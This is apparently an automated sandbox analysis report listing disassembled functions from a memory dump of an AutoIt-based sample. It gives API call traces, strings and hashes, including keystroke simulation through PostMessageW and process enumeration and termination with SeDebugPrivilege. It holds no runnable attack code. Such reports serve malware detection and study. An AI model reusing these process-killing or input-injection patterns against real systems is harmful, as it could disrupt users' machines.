Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DB25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DB25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DB2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DB2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DB2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DB2627

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 7c42c2581fa0f2d326fa80c188e1976dbc0375feb821106c3f32348f6f59366f
Instruction ID: 8cd968a8ffe35e360e955a97c6b0ee0b8d798da51f9d4bed2b6ad9421039a9c9
Opcode Fuzzy Hash: 7c42c2581fa0f2d326fa80c188e1976dbc0375feb821106c3f32348f6f59366f
Instruction Fuzzy Hash: B90124313A0350BBFB2077688CCAF9A3F59DB5EB12F101001F318EE1E1C9E264458A79

Function 00DB1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DB1449,?,?,00000000), ref: 00DB180C
HeapAlloc.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DB1449,?,?,00000000), ref: 00DB1828
GetCurrentProcess.KERNEL32(?,00000000,?,00DB1449,?,?,00000000), ref: 00DB1830
DuplicateHandle.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DB1449,?,?,00000000), ref: 00DB1843
GetCurrentProcess.KERNEL32(00DB1449,00000000,?,00DB1449,?,?,00000000), ref: 00DB184B
DuplicateHandle.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB184E
CreateThread.KERNEL32(00000000,00000000,00DB1874,00000000,00000000,00000000), ref: 00DB1868

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b8ddc84a8075fe8c937f1eb5ad071634bf86a0179b32059fa116219516a167b8
Instruction ID: 3760fb401c22eb0ecf4b72443a2f70efbe500a214e995064efe50c1a50e7d2fc
Opcode Fuzzy Hash: b8ddc84a8075fe8c937f1eb5ad071634bf86a0179b32059fa116219516a167b8
Instruction Fuzzy Hash: 4801BBB5250348BFE710ABA5DC8DF6B3BACEB89B11F405411FA05DF2A1CA709801CB30

Function 00DDA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00DBD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00DBD501
Part of subcall function 00DBD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00DBD50F
Part of subcall function 00DBD4DC: FindCloseChangeNotification.KERNEL32(00000000), ref: 00DBD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA16D
GetLastError.KERNEL32 ref: 00DDA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00DDA268
GetLastError.KERNEL32(00000000), ref: 00DDA273
CloseHandle.KERNEL32(00000000), ref: 00DDA2C4

Strings

SeDebugPrivilege, xrefs: 00DDA18F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: d0504c35b157677adfdf760c5ae6e6e4a90a7bc07f7a349aaad9153efd9064fe
Instruction ID: b65b620e6011d131219a4b26c977031c5a8f2ec67cdc0e3bbff8eefeeb3aefcd
Opcode Fuzzy Hash: d0504c35b157677adfdf760c5ae6e6e4a90a7bc07f7a349aaad9153efd9064fe
Instruction Fuzzy Hash: 8D618C302093429FD710DF19C894F16BBE1AF44318F58C49DE8668B7A2C772ED49CBA2

Function 00DE3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DE3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DE393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DE3954
_wcslen.LIBCMT ref: 00DE3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00DE39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DE39F4

Strings

SysListView32, xrefs: 00DE38F7

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 7b77353fb49686e20043736a69ee1a6c15d0d6c1abd88e3cafc6d8a0951aef1e
Instruction ID: c3a85fe8f90be1d95c1dd3464c728e6d05af6906c61d94922f81eac1f9da8c09
Opcode Fuzzy Hash: 7b77353fb49686e20043736a69ee1a6c15d0d6c1abd88e3cafc6d8a0951aef1e
Instruction Fuzzy Hash: 3641C671A00358ABDF21AF65CC89BFA77A9EF08350F140126F958E7291D771DA80CBB0

Function 00DBBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DBBCFD
IsMenu.USER32(00000000), ref: 00DBBD1D
CreatePopupMenu.USER32 ref: 00DBBD53
GetMenuItemCount.USER32(01774778), ref: 00DBBDA4
InsertMenuItemW.USER32(01774778,?,00000001,00000030), ref: 00DBBDCC

Strings

0, xrefs: 00DBBCA8
2, xrefs: 00DBBD37

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 02ee67f2b1c052608a53267f49599fa053edf2068e44ba55eae1f4e2dc0147c4
Instruction ID: cd1d7eb5582d681c2c6f1b2fe9f07fb8508ee71530e1a9d218750051a1acf322
Opcode Fuzzy Hash: 02ee67f2b1c052608a53267f49599fa053edf2068e44ba55eae1f4e2dc0147c4
Instruction Fuzzy Hash: EE517970A00205DBDB20DFA8D884BEEBBF4EF45324F18421AE4539B290E7B89941CB71

Function 00DBC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00DBC913

Strings

blank, xrefs: 00DBC895
stop, xrefs: 00DBC8E4
warning, xrefs: 00DBC8FC
info, xrefs: 00DBC8B4
question, xrefs: 00DBC8CC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 6c5923211379623a83ffdd671ba8d7cb009fee6e59ccab685f517b5188aa07c8
Instruction ID: 9e52665612114ae79edce44d11745a303e8dcb42909ea8c749ba11597e871374
Opcode Fuzzy Hash: 6c5923211379623a83ffdd671ba8d7cb009fee6e59ccab685f517b5188aa07c8
Instruction Fuzzy Hash: 03112B35699306FBFB015B149C82CEA279CEF15319B60602BF505E62C2E7609D405674

Function 00DBED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00DBED2A
_wcslen.LIBCMT ref: 00DBED3B
_wcslen.LIBCMT ref: 00DBED79
_wcslen.LIBCMT ref: 00DBEDAF
_wcslen.LIBCMT ref: 00DBEDDF
_wcslen.LIBCMT ref: 00DBEDEF
_wcslen.LIBCMT ref: 00DBEE2B
_wcslen.LIBCMT ref: 00DBEE5A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: ceafeafc391e9b64c0d6db14d33ba36424a8f47980419781e64660fb2a4b1036
Instruction ID: 11a762f2c27edc6902b4d75f290bdf52484a0bf4528e98dcd565c5d4fd5967b8
Opcode Fuzzy Hash: ceafeafc391e9b64c0d6db14d33ba36424a8f47980419781e64660fb2a4b1036
Instruction Fuzzy Hash: CF41A265D10218B6CB11EBF4888A9CFB7B8EF45310F508566F519E3122FB34E245C7BA

Function 00D6F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00D6F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DAF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DAF454

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 87959d85c0c767dd7ab7106c8061ab2183cc3099cfcd2f04096d1e1af5f1b0de
Instruction ID: 3465206ee7d0f75dbe590554edc7187c13b3d6048e88a4aecf3121e015c8622c
Opcode Fuzzy Hash: 87959d85c0c767dd7ab7106c8061ab2183cc3099cfcd2f04096d1e1af5f1b0de
Instruction Fuzzy Hash: A8412D31508B80BFD7399B69E8C872E7B91AB56314F1C447EE0D756660C671D881CF31

Function 00DE2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DE2D1B
GetDC.USER32(00000000), ref: 00DE2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DE2D2E
ReleaseDC.USER32(00000000,00000000), ref: 00DE2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DE2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DE2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DE5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00DE2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DE2DE1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 51a2a40c611c628a6915611ea4b8bfd99d64038db5f773fccde8ec66075e71fb
Instruction ID: bb5bb7cbc37cce5ccd7f632dc83455478e84f13ae689659356404fe670e4f2e3
Opcode Fuzzy Hash: 51a2a40c611c628a6915611ea4b8bfd99d64038db5f773fccde8ec66075e71fb
Instruction Fuzzy Hash: B8318B72211294BBEB119F558C8AFFB3BADEB49721F084055FE08DE2A1C6759C41CBB0

Function 00DB5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00DB5637
_memcmp.LIBVCRUNTIME ref: 00DB5659
_memcmp.LIBVCRUNTIME ref: 00DB5671
_memcmp.LIBVCRUNTIME ref: 00DB5684
_memcmp.LIBVCRUNTIME ref: 00DB569E
_memcmp.LIBVCRUNTIME ref: 00DB56B1
_memcmp.LIBVCRUNTIME ref: 00DB56C9
_memcmp.LIBVCRUNTIME ref: 00DB56E4

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b6ef61edb8e106ab3801818ad7b4050e784efac854ebaa1e5340c91927e8de7b
Instruction ID: a6e8862966b6be1c94d7b41e3daa03ace776525387003e79edb2aa5447abfb37
Opcode Fuzzy Hash: b6ef61edb8e106ab3801818ad7b4050e784efac854ebaa1e5340c91927e8de7b
Instruction Fuzzy Hash: F5210B75740A09FBE2146625AD82FFF335CEF20788F684124FD0A9A585FB20EE1582B5

Function 00DD4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00DD502E, 00DD5383
Not an Object type, xrefs: 00DD5007

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: b1c7697f6783a32e079155a203d4d65820dec10b98c28736b60b18975c968e0c
Instruction ID: 891cfcdaeea7f3332ba32037306233d9b15e0c8f4994dafa521df4e7f4862911
Opcode Fuzzy Hash: b1c7697f6783a32e079155a203d4d65820dec10b98c28736b60b18975c968e0c
Instruction Fuzzy Hash: 75D17E71A0070A9FDF10CF98D881BAEB7B5BF48344F18816AE915AB385D771ED45CBA0

Function 00D91522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00D917FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00D915CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D91651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00D917FB,?,00D917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D916E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D916FB

Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00D917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D91777
__freea.LIBCMT ref: 00D917A2
__freea.LIBCMT ref: 00D917AE

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 842dfa024a6272d8d19887f02567e0a2649780d2de521bccbe363e5684c414a8
Instruction ID: 1faa4ad0db328fc88c96fa7028d2a306bd0c8267949f75b244f61c9bb3533fcd
Opcode Fuzzy Hash: 842dfa024a6272d8d19887f02567e0a2649780d2de521bccbe363e5684c414a8
Instruction Fuzzy Hash: A191D27AE002179ADF219FB4C881AEEBBB5EF49710F194659E805E7281DB35CC44CBB0

Function 00DD4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DD4648
VariantInit.OLEAUT32(?), ref: 00DD4749
VariantClear.OLEAUT32(?), ref: 00DD4753
VariantClear.OLEAUT32(?), ref: 00DD47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00DD472C
Null Object assignment in FOR..IN loop, xrefs: 00DD45D8, 00DD4706, 00DD47BE

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 412c41d966d2e2ec6242eaa7a320785266c40f0664ca8c36a585723f50834679
Instruction ID: 60cda9463eb911d543ac736d57cbe05f88dde5d3a4d423b7affbb01621d526de
Opcode Fuzzy Hash: 412c41d966d2e2ec6242eaa7a320785266c40f0664ca8c36a585723f50834679
Instruction Fuzzy Hash: 09917C71A00219ABDF20CFA5D888FEEBBB8EF46714F14855AF515AB280D7709945CBB0

Function 00DC1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DC125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DC1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DC12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC1430

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 2eafc55b3bccdd0b12aca0d32fee9ff705db46ac7b6398370390e6ee27c87ae3
Instruction ID: 6e4568206f037dd94f6da15ca4e114587ec0630b1cb1994ccb7cf85ecb14f12d
Opcode Fuzzy Hash: 2eafc55b3bccdd0b12aca0d32fee9ff705db46ac7b6398370390e6ee27c87ae3
Instruction Fuzzy Hash: 9791E17990022AAFDB01DF94C885FBEB7B5FF46315F244029E940EB292D774A945CBB0

Function 00D6948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 41559f457323e160a50fe025bfb1051c7544049b65aeb3acb86f129244b7582b
Instruction ID: 9de335e9347c3352d65bb56b9679bc27f2cd24fa07747da766bf484b596bd4ba
Opcode Fuzzy Hash: 41559f457323e160a50fe025bfb1051c7544049b65aeb3acb86f129244b7582b
Instruction Fuzzy Hash: E6910371900219EFCB10CFA9CC94AEEBBB8FF49320F148559E516B7251D774AA42CBB0

Function 00DD3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DD396B
CharUpperBuffW.USER32(?,?), ref: 00DD3A7A
_wcslen.LIBCMT ref: 00DD3A8A
VariantClear.OLEAUT32(?), ref: 00DD3C1F

Part of subcall function 00DC0CDF: VariantInit.OLEAUT32(00000000), ref: 00DC0D1F
Part of subcall function 00DC0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DC0D28
Part of subcall function 00DC0CDF: VariantClear.OLEAUT32(?), ref: 00DC0D34

Strings

AUTOIT.ERROR, xrefs: 00DD3A80, 00DD3A85
Incorrect Parameter format, xrefs: 00DD39A6, 00DD3BA1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
